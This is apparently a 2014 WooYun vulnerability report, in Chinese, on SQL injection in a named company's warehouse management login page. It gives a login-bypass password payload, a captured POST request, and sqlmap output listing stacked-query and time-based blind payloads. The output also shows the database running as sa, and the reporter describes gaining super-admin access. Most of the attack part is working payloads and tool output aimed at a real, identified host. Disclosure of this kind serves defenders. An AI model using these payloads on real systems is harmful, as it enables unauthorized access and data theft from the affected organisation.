漏洞详情

披露状态:

2014-03-24: 细节已通知厂商并且等待厂商处理中
2014-03-29: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

偶然发现的sql注入~~ 好丽友某管理系统存在万能密码漏洞导致信息泄露

详细说明:

http://wms.orion.com.cn/login.aspx WMS仓储管理系统



登录密码处没有过滤,导致直接绕过,登录管理后台。



用户名11 密码' or 1=1 or ''='



查看源代码可以看出用户名处是做了过滤的。



805.jpg





218.jpg





登录后是超级管理员,啥都能干了,查询、添加、删除、修改



325.jpg





653.jpg





burp抓包



POST http://wms.orion.com.cn/login.aspx HTTP/1.1

Host: wms.orion.com.cn

User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:18.0) Gecko/20100101 Firefox/18.0

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8

Accept-Language: zh-cn,zh;q=0.8,en-us;q=0.5,en;q=0.3

Accept-Encoding: gzip, deflate

Referer: http://wms.orion.com.cn/login.aspx

Connection: keep-alive

Content-Type: application/x-www-form-urlencoded

Content-Length: 211



__VIEWSTATE=%2FwEPDwUKLTY4NzcyMTIyMmQYAQUeX19Db250cm9sc1JlcXVpcmVQb3N0QmFja0tleV9fFgEFDEltYWdlQnV0dG9uMcN3IkfooEnAiZg5n4QHxOFpWcl9kICU6XQsEMaijHCT&txtLoginName=1&txtPassword=1&ImageButton1.x=44&ImageButton1.y=33





sqlmap跑一下



sqlmap identified the following injection points with a total of 87 HTTP(s) req

ests:

---

Place: POST

Parameter: txtPassword

Type: stacked queries

Title: Microsoft SQL Server/Sybase stacked queries

Payload: __VIEWSTATE=/wEPDwUKLTY4NzcyMTIyMmQYAQUeX19Db250cm9sc1JlcXVpcmVQb3

0QmFja0tleV9fFgEFDEltYWdlQnV0dG9uMcN3IkfooEnAiZg5n4QHxOFpWcl9kICU6XQsEMaijHCT&t

tLoginName=1&txtPassword=1'; WAITFOR DELAY '0:0:5';--&ImageButton1.x=44&ImageBu

ton1.y=33



Type: AND/OR time-based blind

Title: Microsoft SQL Server/Sybase time-based blind

Payload: __VIEWSTATE=/wEPDwUKLTY4NzcyMTIyMmQYAQUeX19Db250cm9sc1JlcXVpcmVQb3

0QmFja0tleV9fFgEFDEltYWdlQnV0dG9uMcN3IkfooEnAiZg5n4QHxOFpWcl9kICU6XQsEMaijHCT&t

tLoginName=1&txtPassword=1' WAITFOR DELAY '0:0:5'--&ImageButton1.x=44&ImageButt

n1.y=33

---

[16:36:59] [INFO] testing MySQL

[16:36:59] [WARNING] it is very important not to stress the network adapter's b

ndwidth during usage of time-based queries

[16:37:08] [WARNING] the back-end DBMS is not MySQL

[16:37:08] [INFO] testing Oracle

[16:37:17] [WARNING] the back-end DBMS is not Oracle

[16:37:17] [INFO] testing PostgreSQL

[16:37:26] [WARNING] the back-end DBMS is not PostgreSQL

[16:37:26] [INFO] testing Microsoft SQL Server

[16:37:45] [INFO] confirming Microsoft SQL Server

[16:38:23] [INFO] the back-end DBMS is Microsoft SQL Server

web server operating system: Windows Vista

web application technology: ASP.NET, ASP.NET 4.0.30319, Microsoft IIS 7.0

back-end DBMS: Microsoft SQL Server 2000



用户是sa,13个表,时间注入的,太慢了,不跑了。

209.jpg

漏洞证明:

已经证明。

修复方案:

过滤所有可能的参数。

版权声明:转载请注明来源 Mr.leo@乌云


漏洞回应

厂商回应:

危害等级:无影响厂商忽略

忽略时间:2014-03-24 16:29

厂商回复:

最新状态:

暂无


漏洞评价: